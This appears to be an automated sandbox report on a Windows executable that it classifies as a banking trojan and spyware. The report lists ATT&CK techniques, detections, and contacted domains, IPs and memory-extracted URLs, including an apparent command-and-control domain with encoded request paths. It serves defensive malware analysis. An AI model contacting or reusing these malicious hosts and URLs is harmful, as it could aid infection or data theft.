Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Logon Script (Windows)	File Deletion1	Input Capture1	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection11	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	System Information Discovery26	Distributed Component Object Model	Credential API Hooking3	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery1	SSH	Input Capture1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery11	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery3	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FpYf5EGDO9.exe	46%	Virustotal		Browse
FpYf5EGDO9.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.FpYf5EGDO9.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.FpYf5EGDO9.exe.2140e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.FpYf5EGDO9.exe.2150000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.FpYf5EGDO9.exe.3c40000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Link
ds-ats.member.g02.yahoodns.net	0%	Virustotal	Browse
edge.gycpi.b.yahoodns.net	0%	Virustotal	Browse
soderunovos.website	0%	Virustotal	Browse
222.222.67.208.in-addr.arpa	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://ns.adobp/3	0%	Avira URL Cloud	safe
http://ns.adobe.co/xa	0%	Avira URL Cloud	safe
https://soderunovos.websitehttps://qoderunovos.websiteo	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://ns.adobp/	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://ns.adobe.cmg	0%	Avira URL Cloud	safe
https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw	0%	Avira URL Cloud	safe
https://qoderunovos.website	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
new-fp-shed.wg1.b.yahoo.com	87.248.100.216	true	false		high
myip.opendns.com	84.17.52.63	true	false		high
lycos.com	209.202.254.90	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
ds-ats.member.g02.yahoodns.net	212.82.100.140	true	false	0%, Virustotal, Browse	unknown
yahoo.com	74.6.143.26	true	false		high
edge.gycpi.b.yahoodns.net	87.248.118.22	true	false	0%, Virustotal, Browse	unknown
soderunovos.website	89.44.9.140	true	true	0%, Virustotal, Browse	unknown
www.lycos.com	209.202.254.90	true	false		high
www.yahoo.com	unknown	unknown	false		high
mail.yahoo.com	unknown	unknown	false		high
222.222.67.208.in-addr.arpa	unknown	unknown	true	2%, Virustotal, Browse	unknown
login.yahoo.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/	false		high
https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw	false	Avira URL Cloud: safe	unknown
https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw	false		unknown
https://lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg	false		high
https://mail.yahoo.com/images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif	false		high
https://login.yahoo.com/?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif	false		high
https://www.lycos.com/images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg	false		high
https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ns.adobp/3	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false		high
http://ns.adobe.co/xa	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://soderunovos.websitehttps://qoderunovos.websiteo	FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yahoo.com//	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz	FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
http://ns.adobp/	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://constitution.org/usdeclar.txtC:	FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	low
https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high
http://ns.adobe.cmg	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://qoderunovos.website	FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://www.yahoo.com/u	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://yahoo.com/	FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmp	false		high
http://ns.micro/1S	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	false		unknown
https://soderunovos.website/	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		unknown
http://constitution.org/usdeclar.txt	FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.uxs	RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp	false		unknown
https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL	FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmp	false		high
https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/	FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	false		unknown
http://ns.adobe.ux	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false		unknown
https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high
https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		unknown
https://soderunovos.website	FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	true		unknown
https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		unknown
http://ns.micro/1	RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmp	false		high
https://policies.yahoo.com/w3c/p3p.xml	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo	FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	false		high
https://www.yahoo.com/R	FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
89.44.9.140	soderunovos.website	Romania	9009	M247GB	true
74.6.143.26	yahoo.com	United States	26101	YAHOO-3US	false
209.202.254.90	lycos.com	United States	6354	LYCOSUS	false
87.248.118.22	edge.gycpi.b.yahoodns.net	United Kingdom	203220	YAHOO-DEBDE	false
87.248.100.216	new-fp-shed.wg1.b.yahoo.com	United Kingdom	34010	YAHOO-IRDGB	false
212.82.100.140	ds-ats.member.g02.yahoodns.net	United Kingdom	34010	YAHOO-IRDGB	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	527488
Start date:	23.11.2021
Start time:	20:57:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 23s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	FpYf5EGDO9.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	6
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winEXE@33/20@11/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.9% (good quality ratio 14.4%) Quality average: 83.4% Quality standard deviation: 25.6%
HCA Information:	Successful, ratio: 78% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:59:38	API Interceptor	27x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
89.44.9.140	anIV2qJeLD.exe	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
	PROPERTY DESIGNS.jar	Get hash	malicious	Browse
74.6.143.26	Fuutbqvhmc.dll	Get hash	malicious	Browse
	X4V4jFmFhO.dll	Get hash	malicious	Browse
	bebys10.dll	Get hash	malicious	Browse
	WGEcMZQA.dll	Get hash	malicious	Browse
	vdbb9MZTVz.dll	Get hash	malicious	Browse
	Information.xlsb	Get hash	malicious	Browse
	V3HZtftyV5.xlsb	Get hash	malicious	Browse
	t6i4DJb8qh.xlsb	Get hash	malicious	Browse
	9Ild0p2cVg.xlsb	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.26846.xlsb	Get hash	malicious	Browse
	Attachment_97680.xlsb	Get hash	malicious	Browse
	Attachment_96948.xlsb	Get hash	malicious	Browse
	Document_89069.xlsb	Get hash	malicious	Browse
	Attachment_777329.xlsb	Get hash	malicious	Browse
	co-Payment.xlsb	Get hash	malicious	Browse
	Presentation_812525.xlsb	Get hash	malicious	Browse
	Document_7647.xlsb	Get hash	malicious	Browse
	Document_7647.xlsb	Get hash	malicious	Browse
	Invoice_52133.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
new-fp-shed.wg1.b.yahoo.com	anIV2qJeLD.exe	Get hash	malicious	Browse	87.248.100.216
	0MGLPJiSa5.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.215
	Fuutbqvhmc.dll	Get hash	malicious	Browse	87.248.100.215
	Antic Cracked.exe	Get hash	malicious	Browse	87.248.100.215
	nesfooF2Q1.exe	Get hash	malicious	Browse	87.248.100.215
	X4V4jFmFhO.dll	Get hash	malicious	Browse	87.248.100.216
	GLpkbbRAp2.dll	Get hash	malicious	Browse	87.248.100.216
	youNextNext.dll	Get hash	malicious	Browse	87.248.100.215
	bebys10.dll	Get hash	malicious	Browse	87.248.100.215
	bebys12.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq8.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq1.dll	Get hash	malicious	Browse	87.248.100.216
	nextNextLike.dll	Get hash	malicious	Browse	87.248.100.215
	TFIw2EIiZh.exe	Get hash	malicious	Browse	87.248.100.215
	Solicitor Inquiry No. 001_4921 - UK.xls	Get hash	malicious	Browse	87.248.100.215
	kANwTlkiJp.dll	Get hash	malicious	Browse	87.248.100.215
	gVuD2n1r5v.dll	Get hash	malicious	Browse	87.248.100.215
	304945441205_035156257_20211104.xls	Get hash	malicious	Browse	87.248.100.215
myip.opendns.com	anIV2qJeLD.exe	Get hash	malicious	Browse	84.17.52.63
	gECym.dll	Get hash	malicious	Browse	102.129.143.33
	data.dll	Get hash	malicious	Browse	102.129.143.57
	test1.dll	Get hash	malicious	Browse	102.129.143.57
	test1.dll	Get hash	malicious	Browse	185.32.222.18
	97Ys56eAFo.dll	Get hash	malicious	Browse	84.17.52.9
	new_working_conditions[2021.09.23_12-51].xlsb	Get hash	malicious	Browse	84.17.52.9
	OcEyzBswGm.exe	Get hash	malicious	Browse	84.17.52.41
	Invoice778465.xlsb	Get hash	malicious	Browse	185.189.150.74
	o0AX0nKiUn.dll	Get hash	malicious	Browse	84.17.52.3
	document-1774544026.xls	Get hash	malicious	Browse	84.17.52.79
	316.xlsm	Get hash	malicious	Browse	84.17.52.79
	moan.dll	Get hash	malicious	Browse	84.17.52.79
	document-5505542.xlsm	Get hash	malicious	Browse	84.17.52.79
	document-1223674862.xlsm	Get hash	malicious	Browse	84.17.52.79
	e6.exe	Get hash	malicious	Browse	84.17.52.78
	j81SoD9q5b.xls	Get hash	malicious	Browse	84.17.52.78
	xls.xls	Get hash	malicious	Browse	84.17.52.38
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	84.17.52.25
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	84.17.52.25

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
M247GB	anIV2qJeLD.exe	Get hash	malicious	Browse	89.44.9.140
	sbcPMw271m	Get hash	malicious	Browse	38.201.44.7
	MLEdqapxkp	Get hash	malicious	Browse	45.86.28.44
	from-isoDOCUMENT.EXE1.exe	Get hash	malicious	Browse	152.89.162.59
	DAImS4qg20.dll	Get hash	malicious	Browse	37.120.206.119
	tebdXHvUhB.dll	Get hash	malicious	Browse	37.120.206.119
	KKveTTgaAAsecNNaaaa.x86-20211122-0650	Get hash	malicious	Browse	192.253.247.181
	DOCUMENT.EXE	Get hash	malicious	Browse	152.89.162.59
	E4lCZiGLyr	Get hash	malicious	Browse	38.202.225.99
	Scan_Nov_Payment Advice,PDF.exe	Get hash	malicious	Browse	185.200.116.203
	TFKjmnMrPM.exe	Get hash	malicious	Browse	217.138.212.58
	MrBfVHgunq.exe	Get hash	malicious	Browse	217.138.212.58
	l2QQobwA6w.apk	Get hash	malicious	Browse	185.158.250.193
	riJ6zzi6fc	Get hash	malicious	Browse	206.127.222.213
	KXUcatZZiH	Get hash	malicious	Browse	158.46.140.134
	Linux_amd64	Get hash	malicious	Browse	45.89.175.119
	NmYDz4fPbW	Get hash	malicious	Browse	38.201.44.9
	T8H5LF8GlO	Get hash	malicious	Browse	185.90.60.84
	Novemeber Payment Advice 20211197864,PDF.exe	Get hash	malicious	Browse	185.200.116.203
	yakuza.arm7	Get hash	malicious	Browse	31.12.78.158
YAHOO-3US	0MGLPJiSa5.dll	Get hash	malicious	Browse	74.6.143.25
	Fuutbqvhmc.dll	Get hash	malicious	Browse	74.6.143.26
	T8H5LF8GlO	Get hash	malicious	Browse	98.139.166.49
	TFEkbH3ag3	Get hash	malicious	Browse	98.139.166.22
	X4V4jFmFhO.dll	Get hash	malicious	Browse	74.6.143.26
	jew.x86	Get hash	malicious	Browse	98.139.166.15
	bebys10.dll	Get hash	malicious	Browse	74.6.143.26
	zD1jpTbFQq	Get hash	malicious	Browse	98.139.130.39
	zuroq8.dll	Get hash	malicious	Browse	74.6.143.25
	zuroq1.dll	Get hash	malicious	Browse	74.6.143.25
	52k0qe3yt3.dll	Get hash	malicious	Browse	74.6.143.25
	SayEjNMwtQ.dll	Get hash	malicious	Browse	74.6.143.25
	uj8A47Ew7u.dll	Get hash	malicious	Browse	74.6.143.25
	b3astmode.arm	Get hash	malicious	Browse	98.139.142.39
	WGEcMZQA.dll	Get hash	malicious	Browse	74.6.143.26
	mzfAM4jLfv.dll	Get hash	malicious	Browse	74.6.143.25
	vdbb9MZTVz.dll	Get hash	malicious	Browse	74.6.143.26
	Update-KB250-x86.exe	Get hash	malicious	Browse	67.195.204.72
	Update-KB2984-x86.exe	Get hash	malicious	Browse	67.195.204.74
	Voya6XBdBT	Get hash	malicious	Browse	72.30.110.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
57f3642b4e37e28f5cbe3020c9331b4c	anIV2qJeLD.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	Screenshot00112021.scr.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	1B2C4ED9193792BFE48A5722705085E2AFA7C14FD1951.exe	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
	LOfYSALEZr.dll	Get hash	malicious	Browse	87.248.118.22 212.82.100.140
